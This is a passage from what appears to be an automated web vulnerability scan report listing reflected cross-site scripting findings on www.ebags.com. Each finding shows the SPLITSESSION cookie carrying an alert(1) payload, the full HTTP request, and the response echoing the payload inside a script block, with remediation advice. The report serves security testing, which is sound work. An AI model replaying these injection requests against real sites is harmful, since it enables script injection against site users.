Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /department/wallets-and-accessories HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C48e43'%3balert(1)//f8f1500fa15; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:08:57 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:08:57 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69049


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|48e43';alert(1)//f8f1500fa15');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.64. http://www.ebags.com/help/ [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /help/

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23d8c'%3balert(1)//86e4ede313a was submitted in the SPLITSESSION cookie. This input was echoed as 23d8c';alert(1)//86e4ede313a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /help/ HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C23d8c'%3balert(1)//86e4ede313a; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:05:18 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:05:18 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 47097


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|23d8c';alert(1)//86e4ede313a');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.65. http://www.ebags.com/help/index.cfm [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /help/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa928'%3balert(1)//fd765d25104 was submitted in the SPLITSESSION cookie. This input was echoed as fa928';alert(1)//fd765d25104 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /help/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cfa928'%3balert(1)//fd765d25104; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:04:55 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822CB96B272DALERT281292D27C04ABDB9AA2; expires=Sun, 02-Jan-2011 14:04:55 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 47147


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','BECOME01$COUPONID=40959822CB96B272DALERT281292D27C04ABDB9AA2');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|fa928';alert(1)//fd765d25104');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.66. http://www.ebags.com/info/Compare/index.cfm [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /info/Compare/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38804'%3balert(1)//6fc875325e3 was submitted in the SPLITSESSION cookie. This input was echoed as 38804';alert(1)//6fc875325e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /info/Compare/index.cfm?fuseaction=chart&similarchart=120830 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C38804'%3balert(1)//6fc875325e3; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:19:26 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:19:26 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 56217


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|38804';alert(1)//6fc875325e3');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.67. http://www.ebags.com/info/Compare/index.cfm [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /info/Compare/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5278b'%3balert(1)//284b3efccf0 was submitted in the SPLITSESSION cookie. This input was echoed as 5278b';alert(1)//284b3efccf0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /info/Compare/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C5278b'%3balert(1)//284b3efccf0; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:18:56 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:18:56 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 74993


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|5278b';alert(1)//284b3efccf0');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.68. http://www.ebags.com/members/index.cfm [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /members/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82ed8'%3balert(1)//b6b1b7aa098 was submitted in the SPLITSESSION cookie. This input was echoed as 82ed8';alert(1)//b6b1b7aa098 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /members/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C82ed8'%3balert(1)//b6b1b7aa098; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:03:44 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:03:44 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 45788


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|82ed8';alert(1)//b6b1b7aa098');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.69. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /product/case-logic/sony-psp-game-case/120830

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5aad'%3balert(1)//8dbc73dd980 was submitted in the SPLITSESSION cookie. This input was echoed as b5aad';alert(1)//8dbc73dd980 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /product/case-logic/sony-psp-game-case/120830 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cb5aad'%3balert(1)//8dbc73dd980; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:03:17 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:03:17 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 75685


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','BECOME01$COUPONID=40959822');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|b5aad';alert(1)//8dbc73dd980');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.70. http://www.ebags.com/products/index.cfm [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /products/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 572d1'%3balert(1)//35c9cbd0d5 was submitted in the SPLITSESSION cookie. This input was echoed as 572d1';alert(1)//35c9cbd0d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C572d1'%3balert(1)//35c9cbd0d5; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:17:56 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:17:56 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 74990


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|572d1';alert(1)//35c9cbd0d5');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.71. http://www.ebags.com/products/view/ZoomColorsViews.cfm [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /products/view/ZoomColorsViews.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40fea'%3balert(1)//640b3c4d3a9 was submitted in the SPLITSESSION cookie. This input was echoed as 40fea';alert(1)//640b3c4d3a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/view/ZoomColorsViews.cfm?fuseaction=imagePop&ModelID=120830&ipsid=120830_3_1 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C40fea'%3balert(1)//640b3c4d3a9; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:17:45 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:17:45 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 9160


<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="/style_IE.css" type="text/css">
<script language="JavaScript" type="text/javascript">
v
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|40fea';alert(1)//640b3c4d3a9');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.72. http://www.ebags.com/rewards/index.cfm [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /rewards/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4928f'%3balert(1)//901a0f6a2f6 was submitted in the SPLITSESSION cookie. This input was echoed as 4928f';alert(1)//901a0f6a2f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rewards/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
